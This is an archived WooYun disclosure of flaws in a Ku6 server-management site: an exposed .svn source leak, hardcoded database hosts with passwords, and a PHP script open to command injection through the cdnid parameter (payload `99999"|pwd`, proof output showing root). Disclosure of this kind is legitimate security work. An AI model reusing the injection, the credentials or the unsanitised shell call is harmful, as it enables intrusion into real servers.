酷6网服务器统一管理平台源码泄露（进而引发命令执行漏洞）

发表于 2014年12月27日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2014-088879

漏洞标题：酷6网服务器统一管理平台源码泄露（进而引发命令执行漏洞）

漏洞详情

披露状态：

2014-12-27: 细节已通知厂商并且等待厂商处理中
2014-12-27: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-01-01: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

酷6网服务器统一管理平台源码泄露（进而引发命令执行漏洞）

详细说明：

可直接下载整站源码http://fixedassets.ku6.cn/.svn/entries

进行源码分析发现这是一台非常敏感的服务器，配置服务器用的

function server_group_assign()	//批量分配服务器<br>
	{<br>
		require './inc_check_permit.php';<br>
		if (!isPermitted("server_op"))<br>
		{<br>
			$this->window_alert("无此操作权限");<br>
			return false;<br>
		}<br>
		$fixed = __post('fixed');<br>
		if(empty($fixed)){<br>
			$this->window_alert('请选择你要分配的服务器！');<br>
			return false;<br>
		}<br>
		$server_array = array();<br>
		//var_dump($fixed);exit();<br>
		foreach($fixed as $k=>$v){<br>
			$server_id = $k;<br>
			$server_array[] = $k;<br>
			$business_id = $v['business_id'];<br>
			$this->validate($business_id, 'not_zero', null, '编号为【'.$k.'】的服务器：业务必须填写');<br>
			$sub_business_id = $v['sub_business_id'];<br>
			$this->validate($sub_business_id, 'not_zero', null, '编号为【'.$k.'】的服务器：子业务必须填写');<br>
			$depart = $v['depart'];<br>
			$this->validate($depart, 'not_zero', null, '编号为【'.$k.'】的服务器：所属部门必须填写');<br>
			$person = $v['person'];<br>
			$this->validate($person, 'not_zero', null, '编号为【'.$k.'】的服务器：所属部门责任人必须填写');<br>
			$supporter = $v['supporter'];<br>
			$this->validate($supporter, 'not_zero', null, '编号为【'.$k.'】的服务器：联系人必须填写');<br>
			$backup_supporter = $v['backup_supporter'];<br>
			$this->validate($backup_supporter, 'not_zero', null, '编号为【'.$k.'】的服务器：备份联系人必须填写');<br>
		}

function server_group_assign() //批量分配服务器

{

require './inc_check_permit.php';

if (!isPermitted("server_op"))

{

$this->window_alert("无此操作权限");

return false;

}

$fixed = __post('fixed');

if(empty($fixed)){

$this->window_alert('请选择你要分配的服务器！');

return false;

}

$server_array = array();

//var_dump($fixed);exit();

foreach($fixed as $k=>$v){

$server_id = $k;

$server_array[] = $k;

$business_id = $v['business_id'];

$this->validate($business_id, 'not_zero', null, '编号为【'.$k.'】的服务器：业务必须填写');

$sub_business_id = $v['sub_business_id'];

$this->validate($sub_business_id, 'not_zero', null, '编号为【'.$k.'】的服务器：子业务必须填写');

$depart = $v['depart'];

$this->validate($depart, 'not_zero', null, '编号为【'.$k.'】的服务器：所属部门必须填写');

$person = $v['person'];

$this->validate($person, 'not_zero', null, '编号为【'.$k.'】的服务器：所属部门责任人必须填写');

$supporter = $v['supporter'];

$this->validate($supporter, 'not_zero', null, '编号为【'.$k.'】的服务器：联系人必须填写');

$backup_supporter = $v['backup_supporter'];

$this->validate($backup_supporter, 'not_zero', null, '编号为【'.$k.'】的服务器：备份联系人必须填写');

}

#3 某附件直接存放了生产服务器的密码

http://fixedassets.ku6.cn/config_check_list.php 各种敏感信息

$res = real_mysql_query($sql, '125.76.238.232', 'itil', 'Itil', 'storage_cluster', 3306);<br>
$res = real_mysql_query($sql, '203.187.170.74', 'root', 'dogoicq', 'itil', 3305);

1 2	$res = real_mysql_query($sql, '125.76.238.232', 'itil', 'Itil', 'storage_cluster', 3306);<br> $res = real_mysql_query($sql, '203.187.170.74', 'root', 'dogoicq', 'itil', 3305);

# 代码执行漏洞在这里CdnDeleveMdfy.php

<?<br>
#＃＃＃＃生效<br>
$cdnid=$_GET['cdnid'];<br>
if ($_GET['reload'])<br>
{<br>
	$OK1=`curl -is "http://59.151.119.26:8080/cmd/4?cdnid=$cdnid"`;<br>
	echo nl2br($OK1);<br>
}<br>
?>

<?

#＃＃＃＃生效

$cdnid=$_GET['cdnid'];

if ($_GET['reload'])

{

$OK1=`curl -is "http://59.151.119.26:8080/cmd/4?cdnid=$cdnid"`;

echo nl2br($OK1);

}

传入 reload=1 & cdnid=99999"|pwd 就执行命令了

漏洞证明：

$uname -a<br>
Linux server.oss.com 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64<br>
$pwd<br>
/data/WWW/itil/htdocs<br>
$whoami<br>
root

$uname -a

Linux server.oss.com 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64

$pwd

/data/WWW/itil/htdocs

$whoami

root

修复方案：

更改配置

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-01-0102:02

厂商回复：

漏洞Rank：15 (WooYun评价)

评价

原文连接：酷6网服务器统一管理平台源码泄露（进而引发命令执行漏洞） 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

酷6网服务器统一管理平台源码泄露（进而引发命令执行漏洞）

漏洞概要

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

漏洞回应

厂商回应：

厂商回复：

最新状态：

评价